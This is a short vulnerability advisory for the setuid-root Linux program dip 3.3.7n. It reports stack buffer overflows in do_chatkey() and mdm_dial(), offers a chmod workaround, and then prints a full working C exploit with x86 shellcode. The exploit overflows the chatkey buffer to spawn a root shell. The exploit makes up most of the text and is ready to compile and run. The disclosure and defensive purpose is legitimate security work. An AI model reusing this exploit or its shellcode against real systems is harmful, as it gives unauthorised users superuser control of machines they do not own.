PROGRAM: dip 3.3.7n, and probably other variants
AFFECTED SYSTEMS: Linux - Slackware 3.0 and RedHat 2.1 verified, others unknown.
IMPACT: Local users can get superuser privileges.
SYNOPSIS: Some Linux distributions come with dip setuid root by default. There are multiple points in dip where an unbounded buffer is used with user supplied data, making a stack overflow possible. Functions in which this appears to be possible include do_chatkey() and mdm_dial().
WORKAROUND: It is suggested that, at least until the source has been further scrutinized, dip not be setuid unless necessary. chmod 0755 dip If you must have dip setuid, place it in a group where it can only be executed by trusted users.
SAMPLE EXPLOIT: /* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/stat.h> #define PATH_DIP "/usr/sbin/dip" u_char shell[] = /* courtesy of avalon ;) */ "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; u_long esp() { __asm__("movl %esp, %eax"); } main() { u_char buf[1024]; u_long addr; int i, f; strcpy(buf, "chatkey "); addr = esp() - 192; for (i=8; i<128+16; i+=4) *((u_long *) (buf+i)) = addr; for (i=128+16; i<512; i++) buf[i] = 0x90; for (i=0; i<strlen(shell); i++) buf[512+i] = shell[i]; buf[512+i] = '\n'; if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) { perror("temp.dip"); exit(0); } write(f, buf, 512+i); close(f); execl(PATH_DIP, "dip", "temp.dip", (char *)0); }
-------------------------------------------------------------------- Dan Walters djw@mail.utexas.edu